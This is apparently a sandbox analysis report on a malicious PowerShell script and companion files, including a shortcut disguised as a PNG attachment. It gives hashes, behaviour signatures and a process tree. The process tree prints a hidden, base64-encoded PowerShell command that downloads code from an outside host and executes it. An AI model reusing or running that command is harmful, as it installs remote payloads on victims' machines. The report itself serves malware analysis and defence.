Overview
overview
10Static
static
104bd/472-84...mp.dll
windows7_x64
34bd/472-84...mp.dll
windows10_x64
34bd/Attach...ng.lnk
windows7_x64
84bd/Attach...ng.lnk
windows10_x64
8Attachment.png.lnk
windows7_x64
8Attachment.png.lnk
windows10_x64
8work.ps1
windows7_x64
8work.ps1
windows10_x64
84bd/ldr.dat.ps1
windows7_x64
104bd/ldr.dat.ps1
windows10_x64
14bd/work.ps1
windows7_x64
84bd/work.ps1
windows10_x64
8Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
25-08-2021 20:27
Static task
static1
Behavioral task
behavioral1
Sample
4bd/472-84-0x000000001A910000-0x000000001A919000-memory.dmp.dll
Resource
win7v20210408
Behavioral task
behavioral2
Sample
4bd/472-84-0x000000001A910000-0x000000001A919000-memory.dmp.dll
Resource
win10v20210410
Behavioral task
behavioral3
Sample
4bd/Attachment.png.lnk
Resource
win7v20210408
Behavioral task
behavioral4
Sample
4bd/Attachment.png.lnk
Resource
win10v20210410
Behavioral task
behavioral5
Sample
Attachment.png.lnk
Resource
win7v20210408
Behavioral task
behavioral6
Sample
Attachment.png.lnk
Resource
win10v20210410
Behavioral task
behavioral7
Sample
work.ps1
Resource
win7v20210410
Behavioral task
behavioral8
Sample
work.ps1
Resource
win10v20210408
Behavioral task
behavioral9
Sample
4bd/ldr.dat.ps1
Resource
win7v20210410
Behavioral task
behavioral10
Sample
4bd/ldr.dat.ps1
Resource
win10v20210408
Behavioral task
behavioral11
Sample
4bd/work.ps1
Resource
win7v20210410
Behavioral task
behavioral12
Sample
4bd/work.ps1
Resource
win10v20210408
General
-
Target
work.ps1
-
Size
1.4MB
-
MD5
7ba4b5c5d3e3276a3cfe8d581cf7173b
-
SHA1
79ba87b46562e75f097c1b6d23d3b63b9160bbaa
-
SHA256
73737bf28fa00ea1380bf98a76f6c2ff34bf25e8b489750acccc45df8e898022
-
SHA512
ccccc4402edc1c333f2b11955b4c2850f5b68674e473d57521cb009e2047a46f9c57c0151b9191d4a2e3b10931723d0191bba9b299ffb3bb293ff7d6f83598c6
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 7 1680 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid process 1844 powershell.exe 1680 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1844 powershell.exe Token: SeDebugPrivilege 1680 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
powershell.exedescription pid process target process PID 1844 wrote to memory of 1680 1844 powershell.exe powershell.exe PID 1844 wrote to memory of 1680 1844 powershell.exe powershell.exe PID 1844 wrote to memory of 1680 1844 powershell.exe powershell.exe
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\work.ps11⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1844 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -enc JABNAD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAnAGgAdAB0AHAAOgAvAC8AYQB0AGgAaQBuAGcAYwBhAGwAbABlAGQAYwBhAGsAZQAuAGMAbwBtAC8AZgBpAGwAZQAnACkAOwAkAHQAPQAkAE0ALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAKAApADsAJABSAD0AJAB0AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACgAKQA7ACQARgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAgACQAUgA7ACQAcAA9ACQARgAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AGkAZQB4ACgAJABwACkAOwAgAA==2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1680
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5c7da0296f2ff751db2bee1f60fb96bc3
SHA12027adc7aad82b7f9ceb790ae5f8fea3aa49ceec
SHA2565bbff7738e03fd10bd8b47e0ed86a2400d7d52a46cadc41be3a723ed5d0b69ab
SHA51217aad10d420cb59cd8eba8b64f5167f53fe8a6cd9a7b9e52cd53a4aa4b111bf73451828648013ef81aec3bcddb10754d536bbfff4425424381b7b670e751dce3
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5f18b2cecdb2f0b19a56a5fa4b254b7e0
SHA1893597d400792a642b2e7fee41c3bdf3f5062347
SHA2563bb174406252dcb336f52f43807b7d1906782c7aa2af753c63726d0066020738
SHA512b06139db7aa51c415f6f3860a02965c787242d895a03222159362075f8eb94f8ee8b1af9b228153017335757df4019b52a8ac261be4f517b5f5af5517965cd81